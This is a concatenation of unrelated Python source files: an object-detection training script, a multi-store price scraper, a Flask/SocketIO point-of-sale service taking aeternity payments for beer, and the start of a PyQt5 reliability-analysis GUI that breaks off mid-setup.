def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
profile=FLAGS.profile,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int((FLAGS.eval_samples + FLAGS.eval_batch_size - 1) //
FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
# Checkpoint might be not already deleted by the time eval finished.
# We simply skip ssuch case.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
HTMLInfo.py | import AMZPrice
import BBPrice
import JDPrice
import TMprice
import re
import requests
import sys
import threading
from selenium import webdriver
REFERER = ""
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/58.0.3029.110 Safari/537.36',
'referer': REFERER
}
line_break_pattern = re.compile('\n')
JD = re.compile('search.jd.com')
AMZ = re.compile('www.amazon.cn')
TM = re.compile('s.taobao.com')
BB = re.compile('d.beibei.com')
def get_info_from_jd(item, infolist, driver):
jd = JDPrice.JDPrice(item)
data_dict = {"ICON": "icon/JD.png", "URL": item, "NAME": jd.get_product_name(), "PRICE": jd.get_product_price(),
"JPG": jd.get_product_jpg(), "PROMOTION": jd.get_product_promotion()}
infolist.append(data_dict)
def get_info_from_amazon(item, info_list, driver):
amz = AMZPrice.AMZPrice(item)
data_dict = {"ICON": "icon/AMZ.png", "URL": item, "NAME": amz.get_product_name(), "PRICE": amz.get_product_price(),
"JPG": amz.get_product_jpg(), "PROMOTION": amz.get_product_promotion()}
info_list.append(data_dict)
def get_info_from_tmall(item, infolist, driver):
tm = TMprice.TMprice(item)
data_dict = tm.get_info_2dictionary(driver)
if data_dict:
data_dict["ICON"] = "icon/TM.jpg"
infolist.append(data_dict)
def get_info_from_beibei(item, infolist, driver):
bb = BBPrice.BBPrice(item)
data_dict = {"ICON": "icon/BB.jpg", "URL": item, "NAME": bb.get_product_name(), "PRICE": bb.get_product_price(),
"JPG": bb.get_product_jpg(), "PROMOTION": bb.get_product_promotion()}
infolist.append(data_dict)
def create_jd_url(urls, url_list):
for url in urls:
jd = JDPrice.JDPrice(url)
jd.create_url(url_list)
def create_amazon_url(urls, url_list):
for url in urls:
amz = AMZPrice.AMZPrice(url)
amz.create_url(url_list)
def create_tmall_url(urls, url_list):
for url in urls:
tm = TMprice.TMprice(url)
tm.create_url(url_list)
def create_beibei_url(urls, url_list):
for url in urls:
bb = BBPrice.BBPrice(url)
bb.create_url(url_list)
def get_jd_items(url, item_list):
jd = JDPrice.JDPrice(url)
jd.get_itemlist(item_list)
def get_amazon_items(url, item_list):
amz = AMZPrice.AMZPrice(url)
amz.get_item_list(item_list)
def get_tmall_items(url, item_list):
tm = TMprice.TMprice(url)
tm.get_item_list(item_list)
def get_beibei_items(url, item_list):
bb = BBPrice.BBPrice(url)
bb.get_itemlist(item_list)
CALLBACK = {
"JD": get_info_from_jd,
"AMZ": get_info_from_amazon,
"TM": get_info_from_tmall,
"BB": get_info_from_beibei,
}
getTypeItemList = {
"JD": get_jd_items,
"AMZ": get_amazon_items,
"TM": get_tmall_items,
"BB": get_beibei_items,
}
createTypeURL = {
"JD": create_jd_url,
"AMZ": create_amazon_url,
"TM": create_tmall_url,
"BB": create_beibei_url,
}
class HTMLinfo(object):
def __init__(self, url):
self.url = url
self.products = []
self.products_urls = []
self.item_list = []
self.url_list = []
self.pages = None
self.type = None
self.data_dict = {}
self.info_list = []
def shop(self):
if re.search(JD, self.url):
self.type = "JD"
elif re.search(AMZ, self.url):
self.type = "AMZ"
elif re.search(TM, self.url):
self.type = "TM"
elif re.search(BB, self.url):
self.type = "BB"
else:
print("Error: Wrong type shop!!!")
sys.exit()
def multi_process(self):
length = len(self.item_list)
if self.type == "TM":
driver = get_web_driver()
if not driver:
sys.exit()
# Need check in my patches to use this function
# driver.minimize_window()
else:
driver = None
for i in self.item_list[::4]:
index = self.item_list.index(i)
task_list = []
callback = CALLBACK[self.type]
t1 = threading.Thread(target=callback, args=(i, self.info_list, driver))
task_list.append(t1)
if (index + 1) < length:
t2 = threading.Thread(target=callback, args=(self.item_list[index + 1], self.info_list, driver))
task_list.append(t2)
if (index + 2) < length:
t3 = threading.Thread(target=callback, args=(self.item_list[index + 2], self.info_list, driver))
task_list.append(t3)
if (index + 3) < length:
t4 = threading.Thread(target=callback, args=(self.item_list[index + 3], self.info_list, driver))
task_list.append(t4)
for t in task_list:
t.start()
for t in task_list:
t.join()
if self.type == "TM":
driver.quit()
def get_goods(self):
with open("cfg/PRODUCT", "r", encoding='UTF-8') as f:
for line in f.readlines():
product = re.sub(line_break_pattern, '', line)
self.products.append(product)
def replace_goods(self):
goods_pattern = re.compile('GOODS')
new = re.sub(line_break_pattern, '', self.url)
self.products_urls = [re.sub(goods_pattern, product, new) for product in self.products]
def get_items(self):
if self.url_list:
for url in self.url_list:
getTypeItemList[self.type](url, self.item_list)
else:
print("There is no URL links!!")
sys.exit()
def create_url(self):
createTypeURL[self.type](self.products_urls, self.url_list)
def get_web_driver():
driver = None
try:
driver = webdriver.Firefox()
except:
try:
driver = webdriver.Chrome()
except:
try:
driver = webdriver.Ie()
except:
print("Error: Web driver cannot access the browser!")
return driver
def get_html(url):
r = requests.get(url, headers=header, timeout=30)
return r
|
pos.py | #!/usr/bin/env python3
# version 0.2.1-DEV
import os
import sys
import logging
import json
import psycopg2
import psycopg2.extras
from psycopg2.pool import ThreadedConnectionPool
from contextlib import contextmanager
import datetime
import argparse
import threading
from queue import Queue
import time
# flask
from flask import Flask, jsonify, abort
from flask_socketio import SocketIO, emit
# aeternity
from aeternity import Config
from aeternity.signing import KeyPair
from aeternity.epoch import EpochClient
# key signing
from ecdsa import SECP256k1, VerifyingKey
import ecdsa
import base58
import base64
from hashlib import sha256
# also log to stdout because docker
root = logging.getLogger()
root.setLevel(logging.INFO)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
root.addHandler(ch)
logging.getLogger("aeternity.epoch").setLevel(logging.WARNING)
# logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
# logging.getLogger("engineio").setLevel(logging.ERROR)
# app secret
flask_secret = os.getenv('APP_SECRET')
access_key = os.getenv('POS_ACCESS_KEY')
epoch_node = os.getenv('EPOCH_NODE')
bar_wallet_private = os.getenv('WALLET_PRIV')
bar_wallet_address = os.getenv('WALLET_PUB')
BEER_PRICE = 1000
def fdate(dt):
"""format a date"""
return dt.strftime('%d/%m/%Y – %H:%M:%S')
def authorize(request_key):
"""validate a request key"""
if request_key == access_key:
return True
return False
def reload_settings():
logging.info("reloading settings")
global pg_host
pg_host = os.getenv('POSTGRES_HOST')
global pg_user
pg_user = os.getenv('POSTGRES_USER')
global pg_pass
pg_pass = os.getenv('POSTGRES_PASSWORD')
global pg_db
pg_db = os.getenv('POSTGRES_DB')
global pg_schema
pg_schema = 'public'
# app secret
global flask_secret
flask_secret = os.getenv('APP_SECRET')
global access_key
access_key = os.getenv('POS_ACCESS_KEY')
global epoch_node
epoch_node = os.getenv('EPOCH_NODE')
global bar_wallet_private
bar_wallet_private = os.getenv('WALLET_PRIV')
global bar_wallet_address
bar_wallet_address = os.getenv('WALLET_PUB')
# ______ ______
# |_ _ `.|_ _ \
# | | `. \ | |_) |
# | | | | | __'.
# _| |_.' /_| |__) |
# |______.'|_______/
#
class PG(object):
def __init__(self, host, user, password, database, poolsize=10):
connect_str = "dbname='{}' user='{}' host='{}' password='{}'".format(
database, user, host, password)
self.pool = ThreadedConnectionPool(1, poolsize, dsn=connect_str)
@contextmanager
def getcursor(self):
con = self.pool.getconn()
try:
yield con.cursor(cursor_factory=psycopg2.extras.DictCursor)
finally:
con.commit()
self.pool.putconn(con)
def execute(self, query, params=()):
"""run a database update
:param query: the query string
:param params: the query parameteres
"""
with self.getcursor() as c:
try:
c.execute(query, params)
except Exception as e:
logging.error(e)
def select(self, query, params=(), many=False):
"""
run a database update
:param query: the query string
:param params: the query parameteres
"""
with self.getcursor() as c:
try:
# Insert a row of data
c.execute(query, params)
if many:
return c.fetchall()
else:
return c.fetchone()
except Exception as e:
logging.error(e)
# ______ ____ ____ _ _____ ____ _____
# .' ___ ||_ || _| / \ |_ _||_ \|_ _|
# / .' \_| | |__| | / _ \ | | | \ | |
# | | | __ | / ___ \ | | | |\ \| |
# \ `.___.'\ _| | | |_ _/ / \ \_ _| |_ _| |_\ |_
# `.____ .'|____||____||____| |____||_____||_____|\____|
#
def get_aeternity():
"""get the epoch client and the genesis keypair from config"""
# configure epoch client in case we need it
epoch = EpochClient(configs=Config(
external_host=epoch_node,
internal_host=f"{epoch_node}/internal",
secure_connection=True
))
logging.info(f"using node at {epoch_node}")
# load the genesis keypair
gp = bar_wallet_address
gk = bar_wallet_private
main_wallet = KeyPair.from_public_private_key_strings(gp, gk)
return epoch, main_wallet
def verify_signature(sender, signature_b64, message):
"""
:param sender: the sender address
:param signature_b64: signature
:param message: message
"""
verified = False
try:
signature = base64.b64decode(signature_b64)
sender_pub = base58.b58decode_check(sender[3:])
logging.debug(
f"sign sender: {sender_pub} signature {signature} tx: {message}")
vk = VerifyingKey.from_string(
sender_pub[1:], curve=SECP256k1, hashfunc=sha256)
verified = vk.verify(signature, bytearray(message, 'utf-8'), sigdecode=ecdsa.util.sigdecode_der)
except Exception:
verified = False
logging.debug(
"sign sender: '{}' signature '{}' tx: {}, verified {}".format(
sender, signature_b64, message, verified
)
)
return verified
# ______ ___ ______ ___ ____ ________ _________ _ ___
# .' ____ \ .' `. .' ___ ||_ ||_ _| |_ __ || _ _ |(_) .' `.
# | (___ \_|/ .-. \/ .' \_| | |_/ / | |_ \_||_/ | | \_|__ / .-. \
# _.____`. | | | || | | __'. | _| _ | | [ || | | |
# | \____) |\ `-' /\ `.___.'\ _| | \ \_ _| |__/ | _| |_ | |\ `-' /
# \______.' `.___.' `.____ .'|____||____||________| |_____| [___]`.___.'
#
socketio = SocketIO()
app = Flask(__name__)
root.addHandler(app.logger)
@socketio.on('scan')
def handle_scan(access_key, tx_hash, tx_signature):
# query the transactions
global cash_register
try:
tx = cash_register.query_tx(tx_hash)
if tx is None:
# transaction not found
reply = {
"tx_hash": tx_hash,
"success": False,
"msg": f"Transaction {tx_hash} doesn't exists"
}
return reply
# tx has been already validated
if tx['scanned_at'] is not None:
reply = {
"tx_hash": tx_hash,
"success": False,
"msg": f"Transaction already executed at {fdate(tx['scanned_at'])}"
}
return reply
if tx['amount'] < BEER_PRICE:
reply = {
"tx_hash": tx_hash,
"success": False,
"msg": f"Amount {tx['amount']} not enough, required {BEER_PRICE}"
}
return reply
# verify_signature
logging.debug(f"sign sender: {tx['sender']} signature {tx_signature} tx: {tx_hash}")
valid = verify_signature(tx['sender'], tx_signature, tx_hash)
if not valid:
# transaction is not valids
reply = {
"tx_hash": tx_hash,
"success": False,
"msg": f"Transaction signature mismatch"
}
return reply
# transaction is good
# update the record
now = datetime.datetime.now()
database.execute(
'update transactions set tx_signature=%s, scanned_at = %s where tx_hash = %s',
(tx_signature, now, tx_hash)
)
# get the wallet name
wallet_name = tx['sender']
row = database.select("select wallet_name from names where public_key = %s", (tx['sender'],))
if row is not None:
wallet_name = row['wallet_name']
# reply
beer_count = "{:.0f}".format(tx['amount'] / BEER_PRICE)
reply = {
"tx_hash": tx_hash,
"success": True,
"msg": f"Success! Serve {beer_count} beer(s) to {wallet_name} [amount {tx['amount']}]"
}
except Exception as e:
logging.error(f"transaction scan {tx_hash} error {e}")
reply = {
"tx_hash": tx_hash,
"success": False,
"msg": f"Error! ask for help!"
}
return reply
@socketio.on('was_beer_scanned')
def handle_was_beer_scanned(tx_hash):
"""check if the trasaction was scanned"""
tx = database.select(
"select * from transactions where tx_hash = %s", (tx_hash,))
reply = {"scanned": False, "scanned_at": None}
if tx is None:
return reply
if tx['scanned_at'] is not None:
reply = {
"scanned": True,
"scanned_at": str(tx['scanned_at'])
}
return reply
@socketio.on('refund')
def handle_refund(access_key, wallet_address, amount):
"""
refund an account from the bar account
:param access_key: the shared secret to authenticate the pos
:param wallet_address: the account to refound
:param amount: the amount to move
"""
reply = {"success": False, "tx_hash": None, "msg": None}
# check the authorization
if not authorize(access_key):
msg = f"Unauthorized access for key '{access_key}'"
logging.error(f"refund: {msg}")
reply['msg'] = msg
return reply
# run the refund
try:
logging.debug(
"from '{}', to '{}', amount '{}'".format(
bar_wallet.get_address(), wallet_address, amount)
)
_, tx_hash = epoch.spend(keypair=bar_wallet,
recipient_pubkey=wallet_address,
amount=int(amount))
wallet_name = wallet_address
row = database.select("select wallet_name from names where public_key = %s", (wallet_address,))
if row is not None:
wallet_name = row['wallet_name']
reply = {
"success": True,
"tx_hash": tx_hash,
"msg": f"Success! Refunded {amount} aet to {wallet_name}"
}
except Exception as e:
reply['msg'] = str(e)
return reply
@socketio.on('set_bar_state')
def handle_set_bar_state(access_key, state):
reply = {"success": False, "msg": None}
# check the authorization
if not authorize(access_key):
reply['msg'] = f"Unauthorized access using key {access_key}, state {state}"
logging.error(reply['msg'])
return reply
# run the update
valid_states = ['open', 'closed', 'out_of_beers']
if state in valid_states:
database.execute("update state set state = %s, updated_at = NOW()", (state,))
# BROADCAST new status
emit('bar_state', {"state": state}, broadcast=True)
logging.info(f"set_bar_state: new state {state}")
reply = {"success": True, "msg": state}
else:
msg = f"Invalid invalid state {state}, allowed {','.join(valid_states)}"
logging.error(msg)
reply = {
"success": False,
"msg": msg
}
# reply to the sender
return reply
@socketio.on('reset_bar')
def handle_reset_bar(access_key):
"""reset the local height of the database to"""
reply = {"success": False, "msg": None}
# check the authorization
if not authorize(access_key):
reply['msg'] = f"Unauthorized access using key {access_key}"
logging.error(reply['msg'])
return reply
logging.info("RESET CHAINHEIGHT IN MIDDLEWARE DATABASE")
database.execute("update pos_height set block_id = %s", (0,))
# reply to the sender
reply = {"success": True, "msg": "chain reset"}
return reply
@socketio.on('get_bar_state')
def handle_get_bar_state():
"""reply to a bar state request"""
row = database.select('select state from state limit 1')
bar_state = row['state']
# logging.info(f"retrieving bar state from database {bar_state}")
return {"state": bar_state}
@socketio.on('get_name')
def handle_get_name(public_key):
"""reverse mapping for the account name"""
row = database.select(
'select wallet_name from names where public_key = %s', (public_key,))
if row is not None:
return {'name': row['wallet_name']}
else:
return {'name': None}
@app.after_request
def after_request(response):
"""enable CORS"""
header = response.headers
header['Access-Control-Allow-Origin'] = '*'
return response
@app.route('/rest/name/<public_key>')
def rest_get_name(public_key):
"""reverse mapping for the account name"""
row = database.select('select wallet_name from names where public_key = %s', (public_key,))
if row is not None:
reply = {"name": row['wallet_name']}
return jsonify(reply)
abort(404)
# global db variable
database = None
# ____ ____ ___ _______ ___ ____ ________ _______
# |_ _| |_ _|.' `.|_ __ \ |_ ||_ _| |_ __ ||_ __ \
# \ \ /\ / / / .-. \ | |__) | | |_/ / | |_ \_| | |__) |
# \ \/ \/ / | | | | | __ / | __'. | _| _ | __ /
# \ /\ / \ `-' /_| | \ \_ _| | \ \_ _| |__/ | _| | \ \_
# \/ \/ `.___.'|____| |___||____||____||________||____| |___|
#
class CashRegisterPoller(object):
"""
Poll the bar account to look for transactions
"""
def __init__(self, db, epoch, bar_wallet, orders_queue, interval=15):
""" Constructor
:type db: PG
:param db: object for database connection
:type epoch: EpochClient
:param epoch: client to interatct with the chain
:type bar_wallet: KeyPair
:param bar_wallet: contains the bar wallet
:type orders_queue: Queue
:param orders_queue: orders chain queue
:type interval: int
:param interval: Check interval, in seconds
"""
self.interval = interval
self.db = db
self.epoch = epoch
self.bar_wallet = bar_wallet
self.orders_queue = orders_queue
def start(self):
"""start the polling """
# start the polling
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start()
def run(self):
interval = 0
while True:
# sleep at the beginning
time.sleep(interval)
interval = self.interval
self.poll()
def query_tx(self, tx_hash):
"""get a ttransaction from the database or None if it's not found"""
q, p = "select * from transactions where tx_hash = %s", (tx_hash,)
tx = self.db.select(q, p)
if tx is None:
self.poll_tx(tx_hash)
tx = self.db.select(q, p)
logging.debug(tx)
return tx
def insert_tx(self, block_id, pos_tx, recipient):
"""insert a transaction in the database if it match the bar account"""
if recipient == self.bar_wallet.get_address():
logging.info(f"FOUND BAR TRANSACTION {pos_tx[0]}")
# insert block
self.db.execute('insert into blocks(height) values (%s) on conflict(height) do nothing',
(block_id,))
# record transaction
self.db.execute('''insert into transactions (tx_hash, sender, amount, block_id, found_at)
values (%s,%s,%s,%s,%s) on conflict(tx_hash) do nothing''',
pos_tx)
def poll_tx(self, tx_hash):
"""poll a specific transaction"""
try:
tx = self.epoch.get_transaction_by_transaction_hash(tx_hash)
block_id = tx.block_height
recipient = tx.tx.recipient
pos_tx = (
tx.hash,
tx.tx.sender,
tx.tx.amount,
block_id,
datetime.datetime.now()
)
self.insert_tx(block_id, pos_tx, recipient)
except Exception as e:
logging.info(f"transaction {tx_hash} lookup error {e}")
raise e
def poll(self):
"""do the polling"""
try:
logging.info('polling chain...')
row = self.db.select("select block_id from pos_height")
local_h = row['block_id']
chain_h = self.epoch.get_height()
logging.info(f"local height {local_h}, chain height {chain_h}")
if local_h == chain_h:
return
while local_h < chain_h:
block_step = min(10, chain_h - local_h)
next_h = local_h + block_step
logging.info(f"query tx in block range {local_h}-{next_h}")
txs = self.epoch.get_transactions_in_block_range(
local_h, next_h, tx_types=['spend_tx'])
for tx in txs:
pos_tx = (
tx.hash,
tx.tx.sender,
tx.tx.amount,
tx.block_height,
datetime.datetime.now()
)
self.insert_tx(tx.block_height, pos_tx, tx.tx.recipient)
# push it into the orders queue to notify the frontend
# self.orders_queue.put({
# 'tx': pos_tx[0],
# 'sender': pos_tx[1],
# 'amount': pos_tx[2],
# 'block_h': pos_tx[3],
# 'time': pos_tx[4],
# })
local_h = next_h
# update the last polled block
self.db.execute('update pos_height set block_id = %s', (local_h,))
except Exception as e:
logging.error("error polling the chain {}".format(e))
# ______ ____ ____ ______ ______
# .' ___ ||_ \ / _||_ _ `. .' ____ \
# / .' \_| | \/ | | | `. \| (___ \_|
# | | | |\ /| | | | | | _.____`.
# \ `.___.'\ _| |_\/_| |_ _| |_.' /| \____) |
# `.____ .'|_____||_____||______.' \______.'
#
def cmd_start(args=None):
if args.config is not None:
# load the parameters from json
# and set them as env var
with open(args.config, 'r') as fp:
config = json.load(fp)
for k in config:
os.environ[k] = config[k]
reload_settings()
# incoming orders will be queued here and sent to the pos client
orders_queue = Queue()
# open db connection
pg_host = os.getenv('POSTGRES_HOST')
pg_user = os.getenv('POSTGRES_USER')
pg_pass = os.getenv('POSTGRES_PASSWORD')
pg_db = os.getenv('POSTGRES_DB')
app.config['SECRET_KEY'] = flask_secret
global database
database = PG(pg_host, pg_user, pg_pass, pg_db)
global epoch
global bar_wallet
epoch, bar_wallet = get_aeternity()
global cash_register
cash_register = CashRegisterPoller(
PG(pg_host, pg_user, pg_pass, pg_db),
epoch,
bar_wallet,
orders_queue,
interval=args.polling_interval)
# backfround worker
if not args.no_poll:
cash_register.start()
# start the app
logging.info('start socket.io')
socketio.init_app(app)
socketio.run(app, host="0.0.0.0", max_size=10000, debug=False)
if __name__ == '__main__':
cmds = [
{
'name': 'start',
'help': 'start the beer aepp-pos-middelware',
'opts': [
{
'names': ['-c', '--config'],
'help':'use the configuration file instead of environment variables',
'default':None
},
{
'names': ['-b', '--no-poll'],
'help':'only start the socketio service not the chain polling worker',
'action': 'store_true',
'default': False
},
{
'names': ['-p', '--polling-interval'],
'help':'polling interval in seconds',
'default': 15
}
]
}
]
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
subparsers.required = True
subparsers.dest = 'command'
# register all the commands
for c in cmds:
subp = subparsers.add_parser(c['name'], help=c['help'])
# add the sub arguments
for sa in c.get('opts', []):
subp.add_argument(*sa['names'],
help=sa['help'],
action=sa.get('action'),
default=sa.get('default'))
# parse the arguments
args = parser.parse_args()
# call the command with our args
ret = getattr(sys.modules[__name__], 'cmd_{0}'.format(
args.command.replace('-', '_')))(args)
|
potc_gui_v_1.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'potc_analysis_gui.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
#import rospy
import math
import pandas as pd
import os
import sys
import csv
import time
import threading
from datetime import datetime
class POTC_Analysis(object):
"""
threshold_type:
True = System POTC Value
False = System Reliability Value
load_control:
True = Failure Rate Calculation Using Operating Load
False = Only Failure Rate
"""
def __init__(self):
self.robot_column_no_dict = {"Yuk": {"Count": 21, "1": 3, "2": 26, "3": 49}, "Mesafe": {"1": 3, "2": 27, "3": 51}, "Hiz": {"1": 81, "2": 149, "3": 217}}
self.distance_list = list()
self.robot_main_dict = {"Yuk": dict(), "Mesafe": dict()}
self.current_workspace = self.get_current_workspace()
#print(self.current_workspace)
self.main_read_func()
self.robot_count = 3
self.initial_configuration_dict = dict()
self.load_control = True
self.threshold_type = True
self.threshold_value = 0.5
self.route_count = 0
# ------------------------------------------------------------------------------------------------
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(950, 700)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(950, 700))
MainWindow.setMaximumSize(QtCore.QSize(950, 700))
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.groupBox_selection_analysis = QtWidgets.QGroupBox(self.centralwidget)
self.groupBox_selection_analysis.setGeometry(QtCore.QRect(20, 20, 570, 330))
font = QtGui.QFont()
font.setPointSize(15)
self.groupBox_selection_analysis.setFont(font)
self.groupBox_selection_analysis.setObjectName("groupBox_selection_analysis")
self.comboBox_select_threshold_type = QtWidgets.QComboBox(self.groupBox_selection_analysis)
self.comboBox_select_threshold_type.setGeometry(QtCore.QRect(275, 150, 150, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.comboBox_select_threshold_type.setFont(font)
self.comboBox_select_threshold_type.setObjectName("comboBox_select_threshold_type")
self.label_5 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_5.setGeometry(QtCore.QRect(0, 150, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_5.setFont(font)
self.label_5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_5.setObjectName("label_5")
self.doubleSpinBox_threshold_value = QtWidgets.QDoubleSpinBox(self.groupBox_selection_analysis)
self.doubleSpinBox_threshold_value.setGeometry(QtCore.QRect(275, 200, 100, 35))
self.doubleSpinBox_threshold_value.setDecimals(5)
self.doubleSpinBox_threshold_value.setMaximum(1.0)
self.doubleSpinBox_threshold_value.setSingleStep(0.05)
self.doubleSpinBox_threshold_value.setProperty("value", 0.5)
self.doubleSpinBox_threshold_value.setObjectName("doubleSpinBox_threshold_value")
self.label_8 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_8.setGeometry(QtCore.QRect(0, 200, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_8.setFont(font)
self.label_8.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.groupBox_selection_analysis)
self.label_9.setGeometry(QtCore.QRect(0, 250, 250, 35))
font = QtGui.QFont()
font.setPointSize(15)
self.label_9.setFont(font)
